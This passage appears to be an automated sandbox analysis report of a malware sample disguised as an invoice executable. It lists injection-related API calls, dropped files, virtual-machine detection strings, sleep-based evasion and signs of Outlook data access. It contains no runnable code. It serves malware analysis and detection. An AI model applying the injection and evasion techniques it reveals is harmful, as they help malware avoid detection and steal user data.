      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35862C30 NtMapViewOfSection,LdrInitializeThunk,4_2_35862C30
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35862C50 NtUnmapViewOfSection,LdrInitializeThunk,4_2_35862C50
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35862F00 NtCreateFile,LdrInitializeThunk,4_2_35862F00
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35862EB0 NtProtectVirtualMemory,LdrInitializeThunk,4_2_35862EB0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35862ED0 NtResumeThread,LdrInitializeThunk,4_2_35862ED0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35862E50 NtCreateSection,LdrInitializeThunk,4_2_35862E50
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358629F0 NtReadFile,LdrInitializeThunk,4_2_358629F0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35862B90 NtFreeVirtualMemory,LdrInitializeThunk,4_2_35862B90
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35862BC0 NtQueryInformationToken,LdrInitializeThunk,4_2_35862BC0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35862B10 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_35862B10
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35862A80 NtClose,LdrInitializeThunk,4_2_35862A80
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35864570 NtSuspendThread,4_2_35864570
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35864260 NtSetContextThread,4_2_35864260
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35862D50 NtWriteVirtualMemory,4_2_35862D50
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35863C90 NtOpenThread,4_2_35863C90
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35862CD0 NtEnumerateKey,4_2_35862CD0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35862C10 NtOpenProcess,4_2_35862C10
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35862C20 NtSetInformationFile,4_2_35862C20
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35863C30 NtOpenProcessToken,4_2_35863C30
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35862FB0 NtSetValueKey,4_2_35862FB0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35862F30 NtOpenDirectoryObject,4_2_35862F30
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35862E80 NtCreateProcessEx,4_2_35862E80
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35862EC0 NtQuerySection,4_2_35862EC0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35862E00 NtQueueApcThread,4_2_35862E00
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358629D0 NtWaitForSingleObject,4_2_358629D0
      Source: AWB_Invoice.exe, 00000001.00000002.62248906995.000000000041E000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamelibgobject-2.0-0.dll* vs AWB_Invoice.exe
      Source: AWB_Invoice.exe, 00000001.00000000.61805299806.0000000000570000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameKubikrdders Forniklingernes.exeb! vs AWB_Invoice.exe
      Source: AWB_Invoice.exe, 00000004.00000002.62379354895.0000000035AC0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs AWB_Invoice.exe
      Source: AWB_Invoice.exe, 00000004.00000003.62227876661.00000000355A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs AWB_Invoice.exe
      Source: AWB_Invoice.exe, 00000004.00000002.62279050012.000000000009C000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCONTROL.EXEj% vs AWB_Invoice.exe
      Source: AWB_Invoice.exe, 00000004.00000002.62364598313.00000000052F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCONTROL.EXEj% vs AWB_Invoice.exe
      Source: AWB_Invoice.exe, 00000004.00000003.62234452698.000000003576C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs AWB_Invoice.exe
      Source: AWB_Invoice.exe, 00000004.00000000.62106031426.0000000000570000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameKubikrdders Forniklingernes.exeb! vs AWB_Invoice.exe
      Source: AWB_Invoice.exe, 00000004.00000002.62379354895.000000003591D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs AWB_Invoice.exe
      Source: C:\Users\user\Desktop\AWB_Invoice.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Windows\SysWOW64\control.exeSection loaded: edgegdi.dllJump to behavior
      Source: AWB_Invoice.exeStatic PE information: invalid certificate
      Source: AWB_Invoice.exeReversingLabs: Detection: 35%
      Source: AWB_Invoice.exeVirustotal: Detection: 54%
      Source: C:\Users\user\Desktop\AWB_Invoice.exeFile read: C:\Users\user\Desktop\AWB_Invoice.exeJump to behavior
      Source: AWB_Invoice.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\AWB_Invoice.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\AWB_Invoice.exe C:\Users\user\Desktop\AWB_Invoice.exe
      Source: C:\Users\user\Desktop\AWB_Invoice.exeProcess created: C:\Users\user\Desktop\AWB_Invoice.exe C:\Users\user\Desktop\AWB_Invoice.exe
      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
      Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
      Source: C:\Users\user\Desktop\AWB_Invoice.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 1_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_0040352D
      Source: C:\Users\user\Desktop\AWB_Invoice.exeFile created: C:\Users\user\AppData\Roaming\DORME.iniJump to behavior
      Source: C:\Users\user\Desktop\AWB_Invoice.exeFile created: C:\Users\user\AppData\Local\Temp\nsnE69B.tmpJump to behavior
      Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@9/12@18/16
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 1_2_004021AA LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,1_2_004021AA
      Source: C:\Users\user\Desktop\AWB_Invoice.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 1_2_0040498A GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,1_2_0040498A
      Source: C:\Users\user\Desktop\AWB_Invoice.exeFile written: C:\Users\user\AppData\Roaming\DORME.iniJump to behavior
      Source: C:\Windows\SysWOW64\control.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
      Source: AWB_Invoice.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: AWB_Invoice.exe, 00000004.00000001.62106830623.0000000000649000.00000020.00000001.01000000.00000006.sdmp
      Source: Binary string: control.pdb source: AWB_Invoice.exe, 00000004.00000002.62279050012.0000000000090000.00000040.10000000.00040000.00000000.sdmp, AWB_Invoice.exe, 00000004.00000002.62364598313.00000000052F7000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdbUGP source: AWB_Invoice.exe, 00000004.00000003.62234452698.000000003563F000.00000004.00000020.00020000.00000000.sdmp, AWB_Invoice.exe, 00000004.00000003.62227876661.0000000035485000.00000004.00000020.00020000.00000000.sdmp, AWB_Invoice.exe, 00000004.00000002.62379354895.00000000357F0000.00000040.00001000.00020000.00000000.sdmp, AWB_Invoice.exe, 00000004.00000002.62379354895.000000003591D000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000006.00000002.66854668230.0000000004CFD000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000006.00000003.62283963539.0000000004A27000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000006.00000002.66854668230.0000000004BD0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000006.00000003.62278595499.000000000487A000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: AWB_Invoice.exe, AWB_Invoice.exe, 00000004.00000003.62234452698.000000003563F000.00000004.00000020.00020000.00000000.sdmp, AWB_Invoice.exe, 00000004.00000003.62227876661.0000000035485000.00000004.00000020.00020000.00000000.sdmp, AWB_Invoice.exe, 00000004.00000002.62379354895.00000000357F0000.00000040.00001000.00020000.00000000.sdmp, AWB_Invoice.exe, 00000004.00000002.62379354895.000000003591D000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000006.00000002.66854668230.0000000004CFD000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000006.00000003.62283963539.0000000004A27000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000006.00000002.66854668230.0000000004BD0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000006.00000003.62278595499.000000000487A000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: control.pdbUGP source: AWB_Invoice.exe, 00000004.00000002.62279050012.0000000000090000.00000040.10000000.00040000.00000000.sdmp, AWB_Invoice.exe, 00000004.00000002.62364598313.00000000052F7000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: AWB_Invoice.exe, 00000004.00000001.62106830623.0000000000649000.00000020.00000001.01000000.00000006.sdmp
      Source: Binary string: firefox.pdb source: control.exe, 00000006.00000003.62576801263.0000000007FD2000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000006.00000003.62524777881.00000000078E8000.00000004.00000020.00020000.00000000.sdmp

      Data Obfuscation

      Source: Yara matchFile source: 00000001.00000002.62251220360.0000000006342000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.62249836866.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 1_2_04E226F7 pushad ; ret 1_2_04E22707
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 1_2_04E252FA push ebp; iretd 1_2_04E25304
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 1_2_04E252F8 push ss; ret 1_2_04E252F9
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 1_2_04E226DD pushad ; ret 1_2_04E22707
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 1_2_04E240B7 pushad ; ret 1_2_04E240BF
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 1_2_04E2649B push esp; iretd 1_2_04E264A7
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 1_2_04E2546B push edi; iretd 1_2_04E254AC
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 1_2_04E23A4A push F64B30A9h; ret 1_2_04E23A4F
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 1_2_04E2364E pushad ; retf 1_2_04E2364F
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 1_2_04E2684C push edi; iretd 1_2_04E26868
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 1_2_04E24058 pushad ; ret 1_2_04E240BF
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 1_2_04E24436 pushad ; retf 1_2_04E2445F
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 1_2_04E247FD push 23172C9Dh; ret 1_2_04E24803
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 1_2_04E231CC pushad ; ret 1_2_04E23203
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 1_2_04E25DDD pushfd ; ret 1_2_04E25DEB
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 1_2_04E22F83 push cs; ret 1_2_04E22F86
      Source: NMDllHost.exe.1.drStatic PE information: section name: .shared
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 1_2_6F612351 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,1_2_6F612351
      Source: C:\Users\user\Desktop\AWB_Invoice.exeFile created: C:\Users\user\AppData\Local\Temp\Barpost\Forstvn\Repressive\Parthavernes\gobject-2.0.dllJump to dropped file
      Source: C:\Users\user\Desktop\AWB_Invoice.exeFile created: C:\Users\user\AppData\Local\Temp\Barpost\Forstvn\Repressive\Parthavernes\NMDllHost.exeJump to dropped file
      Source: C:\Users\user\Desktop\AWB_Invoice.exeFile created: C:\Users\user\AppData\Local\Temp\nscE6F9.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\AWB_Invoice.exeFile created: C:\Users\user\AppData\Local\Temp\Barpost\Forstvn\BtvStack.exeJump to dropped file
      Source: C:\Users\user\Desktop\AWB_Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      Source: C:\Users\user\Desktop\AWB_Invoice.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Users\user\Desktop\AWB_Invoice.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Source: C:\Windows\SysWOW64\control.exe TID: 7608Thread sleep count: 119 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\control.exe TID: 7608Thread sleep time: -238000s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 2364Thread sleep time: -45000s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 2364Thread sleep count: 35 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 2364Thread sleep time: -35000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\AWB_Invoice.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Barpost\Forstvn\Repressive\Parthavernes\gobject-2.0.dllJump to dropped file
      Source: C:\Users\user\Desktop\AWB_Invoice.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Barpost\Forstvn\Repressive\Parthavernes\NMDllHost.exeJump to dropped file
      Source: C:\Users\user\Desktop\AWB_Invoice.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Barpost\Forstvn\BtvStack.exeJump to dropped file
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35861763 rdtsc 4_2_35861763
      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 872Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 881Jump to behavior
      Source: C:\Users\user\Desktop\AWB_Invoice.exeAPI coverage: 1.3 %
      Source: C:\Windows\SysWOW64\control.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 1_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405C49
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 1_2_00406873 FindFirstFileW,FindClose,1_2_00406873
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 1_2_0040290B FindFirstFileW,1_2_0040290B
      Source: C:\Users\user\Desktop\AWB_Invoice.exeAPI call chain: ExitProcess graph end nodegraph_1-4715
      Source: C:\Users\user\Desktop\AWB_Invoice.exeAPI call chain: ExitProcess graph end nodegraph_1-4871
      Source: AWB_Invoice.exe, 00000001.00000002.62328916748.0000000008A79000.00000004.00000800.00020000.00000000.sdmp, AWB_Invoice.exe, 00000004.00000002.62365938253.0000000006EF9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
      Source: AWB_Invoice.exe, 00000001.00000002.62248906995.000000000041E000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: noreply@vmware.com0
      Source: AWB_Invoice.exe, 00000001.00000002.62248906995.000000000041E000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: http://www.vmware.com/0
      Source: AWB_Invoice.exe, 00000001.00000002.62328916748.0000000008A79000.00000004.00000800.00020000.00000000.sdmp, AWB_Invoice.exe, 00000004.00000002.62365938253.0000000006EF9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
      Source: AWB_Invoice.exe, 00000004.00000002.62365938253.0000000006EF9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
      Source: AWB_Invoice.exe, 00000001.00000002.62328916748.0000000008A79000.00000004.00000800.00020000.00000000.sdmp, AWB_Invoice.exe, 00000004.00000002.62365938253.0000000006EF9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
      Source: AWB_Invoice.exe, 00000001.00000002.62248906995.000000000041E000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: VMware, Inc.1!0
      Source: AWB_Invoice.exe, 00000001.00000002.62328916748.0000000008A79000.00000004.00000800.00020000.00000000.sdmp, AWB_Invoice.exe, 00000004.00000002.62365938253.0000000006EF9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
      Source: AWB_Invoice.exe, 00000001.00000002.62328916748.0000000008A79000.00000004.00000800.00020000.00000000.sdmp, AWB_Invoice.exe, 00000004.00000002.62365938253.0000000006EF9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
      Source: AWB_Invoice.exe, 00000004.00000002.62365938253.0000000006EF9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
      Source: AWB_Invoice.exe, 00000004.00000002.62364598313.00000000052F7000.00000004.00000020.00020000.00000000.sdmp, AWB_Invoice.exe, 00000004.00000003.62231140608.00000000052F7000.00000004.00000020.00020000.00000000.sdmp, AWB_Invoice.exe, 00000004.00000003.62231910856.00000000052F7000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000006.00000002.66849658014.0000000002F29000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000006.00000002.66863328196.000000000787E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.63598041200.000000001067E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.66892389836.0000000010682000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.63642983383.0000000010681000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: AWB_Invoice.exe, 00000001.00000002.62248906995.000000000041E000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: VMware, Inc.1
      Source: AWB_Invoice.exe, 00000001.00000002.62248906995.000000000041E000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: VMware, Inc.0
      Source: AWB_Invoice.exe, 00000004.00000002.62364598313.00000000052F7000.00000004.00000020.00020000.00000000.sdmp, AWB_Invoice.exe, 00000004.00000003.62231140608.00000000052F7000.00000004.00000020.00020000.00000000.sdmp, AWB_Invoice.exe, 00000004.00000003.62231910856.00000000052F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWI
      Source: AWB_Invoice.exe, 00000001.00000002.62328916748.0000000008A79000.00000004.00000800.00020000.00000000.sdmp, AWB_Invoice.exe, 00000004.00000002.62365938253.0000000006EF9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
      Source: AWB_Invoice.exe, 00000001.00000002.62328916748.0000000008A79000.00000004.00000800.00020000.00000000.sdmp, AWB_Invoice.exe, 00000004.00000002.62365938253.0000000006EF9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
      Source: AWB_Invoice.exe, 00000004.00000002.62364598313.0000000005298000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: AWB_Invoice.exe, 00000001.00000002.62328916748.0000000008A79000.00000004.00000800.00020000.00000000.sdmp, AWB_Invoice.exe, 00000004.00000002.62365938253.0000000006EF9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
      Source: AWB_Invoice.exe, 00000004.00000002.62365938253.0000000006EF9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 1_2_6F612351 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,1_2_6F612351
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35861763 rdtsc 4_2_35861763
      Source: C:\Users\user\Desktop\AWB_Invoice.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3589E588 mov eax, dword ptr fs:[00000030h]4_2_3589E588
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585A580 mov eax, dword ptr fs:[00000030h]4_2_3585A580
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35859580 mov eax, dword ptr fs:[00000030h]4_2_35859580
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358DF582 mov eax, dword ptr fs:[00000030h]4_2_358DF582
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35852594 mov eax, dword ptr fs:[00000030h]4_2_35852594
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358AC592 mov eax, dword ptr fs:[00000030h]4_2_358AC592
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358C7591 mov edi, dword ptr fs:[00000030h]4_2_358C7591
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358A85AA mov eax, dword ptr fs:[00000030h]4_2_358A85AA
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358245B0 mov eax, dword ptr fs:[00000030h]4_2_358245B0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585C5C6 mov eax, dword ptr fs:[00000030h]4_2_3585C5C6
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581F5C7 mov eax, dword ptr fs:[00000030h]4_2_3581F5C7
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358A05C6 mov eax, dword ptr fs:[00000030h]4_2_358A05C6
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358565D0 mov eax, dword ptr fs:[00000030h]4_2_358565D0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3582B5E0 mov eax, dword ptr fs:[00000030h]4_2_3582B5E0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585A5E7 mov ebx, dword ptr fs:[00000030h]4_2_3585A5E7
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585A5E7 mov eax, dword ptr fs:[00000030h]4_2_3585A5E7
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358515EF mov eax, dword ptr fs:[00000030h]4_2_358515EF
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358A55E0 mov eax, dword ptr fs:[00000030h]4_2_358A55E0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358AC5FC mov eax, dword ptr fs:[00000030h]4_2_358AC5FC
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35822500 mov eax, dword ptr fs:[00000030h]4_2_35822500
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584E507 mov eax, dword ptr fs:[00000030h]4_2_3584E507
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581B502 mov eax, dword ptr fs:[00000030h]4_2_3581B502
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585C50D mov eax, dword ptr fs:[00000030h]4_2_3585C50D
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35841514 mov eax, dword ptr fs:[00000030h]4_2_35841514
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358AC51D mov eax, dword ptr fs:[00000030h]4_2_358AC51D
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358CF51B mov eax, dword ptr fs:[00000030h]4_2_358CF51B
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358CF51B mov ecx, dword ptr fs:[00000030h]4_2_358CF51B
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35851527 mov eax, dword ptr fs:[00000030h]4_2_35851527
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585F523 mov eax, dword ptr fs:[00000030h]4_2_3585F523
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3583252B mov eax, dword ptr fs:[00000030h]4_2_3583252B
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3583252B mov eax, dword ptr fs:[00000030h]4_2_3583252B
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3583252B mov eax, dword ptr fs:[00000030h]4_2_3583252B
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3583252B mov eax, dword ptr fs:[00000030h]4_2_3583252B
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3583252B mov eax, dword ptr fs:[00000030h]4_2_3583252B
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3583252B mov eax, dword ptr fs:[00000030h]4_2_3583252B
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3583252B mov eax, dword ptr fs:[00000030h]4_2_3583252B
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35823536 mov eax, dword ptr fs:[00000030h]4_2_35823536
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35823536 mov eax, dword ptr fs:[00000030h]4_2_35823536
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581753F mov eax, dword ptr fs:[00000030h]4_2_3581753F
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581753F mov eax, dword ptr fs:[00000030h]4_2_3581753F
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581753F mov eax, dword ptr fs:[00000030h]4_2_3581753F
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35862539 mov eax, dword ptr fs:[00000030h]4_2_35862539
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3583E547 mov eax, dword ptr fs:[00000030h]4_2_3583E547
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35856540 mov eax, dword ptr fs:[00000030h]4_2_35856540
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35858540 mov eax, dword ptr fs:[00000030h]4_2_35858540
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3582254C mov eax, dword ptr fs:[00000030h]4_2_3582254C
